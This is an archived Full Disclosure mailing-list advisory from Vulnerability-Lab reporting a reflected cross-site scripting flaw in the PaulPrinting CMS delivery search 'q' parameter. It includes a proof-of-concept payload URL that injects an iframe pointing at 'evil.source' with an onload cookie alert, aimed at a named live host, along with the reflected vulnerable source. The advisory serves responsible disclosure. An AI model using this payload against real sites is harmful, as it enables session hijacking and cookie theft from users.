[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] PaulPrinting CMS - (Search Delivery) Cross Site Scripting Vulnerability
From: "info () vulnerability-lab ! com" <info () vulnerability-lab ! com>
Date: 2023-07-19 7:11:33
Message-ID: b86e40c3-4982-c904-e8e4-ad23b03db8e5 () vulnerability-lab ! com
[Download RAW message or body]
This is an OpenPGP/MIME signed message (RFC 4880 and 3156)
--------------EpA2c8lTFyJARG5jafxyuEmc
From: "info@vulnerability-lab.com" <info@vulnerability-lab.com>
Reply-To: info@vulnerability-lab.com
To: fulldisclosure@seclists.org
Message-ID: <b86e40c3-4982-c904-e8e4-ad23b03db8e5@vulnerability-lab.com>
Subject: PaulPrinting CMS - (Search Delivery) Cross Site Scripting
Vulnerability
Content-Type: multipart/mixed; boundary="------------xSjAgxIQPF479C6LqozlJ6mS"
[Attachment #2 (text/plain)]
Document Title:
===============
PaulPrinting CMS - (Search Delivery) Cross Site Scripting Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2286
Release Date:
=============
2023-07-17
Vulnerability Laboratory ID (VL-ID):
====================================
2286
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and \
with a visually appealing interface.
(Copy of the Homepage:https://codecanyon.net/user/codepaul )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site \
vulnerability in the PaulPrinting (v2018) cms web-application.
Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Open Authentication (Anonymous Privileges)
User Interaction:
=================
Medium User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A client-side cross site scripting vulnerability has been discovered in the official \
PaulPrinting (v2018) cms web-application. Remote attackers are able to manipulate client-side \
requests by injection of malicious script code to compromise user session data.
The client-side cross site scripting web vulnerability is located in the search input field \
with the insecure validated q parameter affecting the delivery module. Remote attackers are \
able to inject own malicious script code to the search input to provoke a client-side script \
code execution without secure encode. The request method to execute is GET and the attack \
vector is non-persistent.
Successful exploitation of the vulnerability results in session hijacking, non-persistent \
phishing attacks, non-persistent external redirects to malicious source and non-persistent \
manipulation of affected application modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] /account/delivery
Vulnerable Input(s):
[+] Search
Vulnerable Parameter(s):
[+] q
Affected Module(s):
[+] /account/delivery
[+] Delivery Contacts
Proof of Concept (PoC):
=======================
The non-persistent xss web vulnerability can be exploited by remote attackers with low \
privileged user account and medium user interaction. For security demonstration or to reproduce \
the vulnerability follow the provided information and steps below to continue.
PoC: Example
https://codeawesome.in/printing/account/delivery?q=
PoC: Exploitation
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source \
onload=alert(document.cookie)>
--- PoC Session Logs (GET) ---
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source \
onload=alert(document.cookie)>
Host: codeawesome.in
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;
-
GET: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
Vulnerable Source: (Search - delivery?q=)
<div class="col-lg-8">
<a href="https://codeawesome.in/printing/account/delivery" class="btn btn-primary mt-4 mb-2 \
float-right"> <i class="fa fa-fw fa-plus"></i>
</a>
<form class="form-inline mt-4 mb-2" method="get">
<div class="input-group mb-3 mr-2">
<input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" \
onload="alert(document.cookie)">"> <div class="input-group-append">
<button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw \
fa-search"></i></button> </div></div>
Security Risk:
==============
The security risk of the cross site scripting web vulnerability with non-persistent attack \
vector is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] \
-https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit \
our material contact (admin@ or research@) to get a ask permission.
Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
["OpenPGP_0x1554D09B2933E2FE.asc" (application/pgp-keys)]
["OpenPGP_signature.asc" (OpenPGP_signature.asc)]
-----BEGIN PGP SIGNATURE-----
wsF5BAABCAAjFiEE0BctHpBdnIQSMWpxFVTQmykz4v4FAmS3jKUFAwAAAAAACgkQFVTQmykz4v6t
sw/8Dg1lSyNfI0nltwgbjDsgzFYwFbNxH13/Ad08PRZRD+Lnog8V7c6Rpjs0/oWknmwQqgyRKnWP
FtSkS4fAYXDSYvYTdMimvTnFCivpkMrQV3mDyrDZ5sapd4mMrzvIS3inSwLfrl/uxlaUoTxaTXft
AfF79TJYXFHY8lrFrHMXoxoZAu1qYSPyncP4jBC7gojfkqDX1d+C8beqx0ZI7uqR0yHOYnUEv+xg
2QlE4ndUFREjrayy1xdvyY14F2DWnm9vQxI1hxbXk3Y4RSXfmTf1fHp6HfE2tIekpDR0Pbi4tWzc
o+fXCcKc/IcgAvSLtuq3KQ+5SXTWADA2b1258MtTHnKNsrnyNZI/fZkAtItZUrj9esbCcvnHmb/n
n5+YyWtJ7/xFaoYSDtT1AUGDFrAGBC01h12w1Y/AwFWBb9LRfEXyYjDiT9sMlNPtsIhnjqXvs5k5
R10tzCyiPi+F297JqcSnp/tylkFv7w+v1NE4LQofNx9c1vTl/0vvioCsZQOP5Ao6+vqEvEwc4enh
3fOd9ltYcWOEUqvC65alaX+9iKN8UOIVvOX9HTe2Dy5jSRPwsTdqUGtBdBZMrrw/JKxsrl3/eBY1
SV9jNQJeoPT0L4KjeTowXOjpKOTSoSy7kefQv8WbY2BVLEUVtJcnOTolUvq/zG6VNOuSPZnvrxf0
32w=
=ruCc
-----END PGP SIGNATURE-----
--------------EpA2c8lTFyJARG5jafxyuEmc--
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
--===============1758579158179610851==--
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic